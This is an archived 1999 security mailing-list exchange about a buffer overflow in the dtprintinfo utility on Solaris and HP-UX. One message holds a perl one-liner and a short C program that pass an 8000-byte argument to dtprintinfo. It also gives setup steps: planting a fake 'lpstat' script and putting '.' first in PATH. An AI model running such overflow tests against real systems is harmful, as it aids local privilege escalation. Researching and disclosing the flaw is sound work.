Hi Paul, I'm sorry for the wrong output I've provided and you are correct: csh will complain about long strings. I've already checked it in another shell and it didn't appear to be vulnerable to the problem. Thiago Zaninotti IMC LABG -----Original Message----- From: Paul Hart [SMTP:hartat_private] Sent: Thursday, May 13, 1999 8:15 PM To: Thiago MM Zaninotti Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits] On Wed, 12 May 1999, Thiago MM Zaninotti wrote: > dtprintinfo in HPUX does not seen to be vulnerable to the overflow problem: > > % /usr/dt/bin/dtprintinfo -p `perl -e "print 'A' x 8000"` > Pathname too long. > % That's a message from your shell, not the dtprintinfo program; the dtprintinfo program is never being run. Your shell thinks that 8000 characters in an argument is too long. You'll need to use a different shell that can handle long arguments (I use tcsh) or make a small C program that execs dtprintinfo with the long command argument. This should work: #include <unistd.h> #include <string.h> #include <stdio.h> #define LENGTH 8000 void main() { char buffer[LENGTH]; memset(buffer, 'A', LENGTH); buffer[LENGTH - 1] = '\0'; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p", buffer, NULL); printf("exec failed"); } Also make sure (at least on Solaris) that you have a script in your current directory named "lpstat" and that "." is the first element of your PATH environment variable. Here's what I have for my lpstat script: #!/bin/sh echo "system for lpprn: localhost"
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:45:57 PDT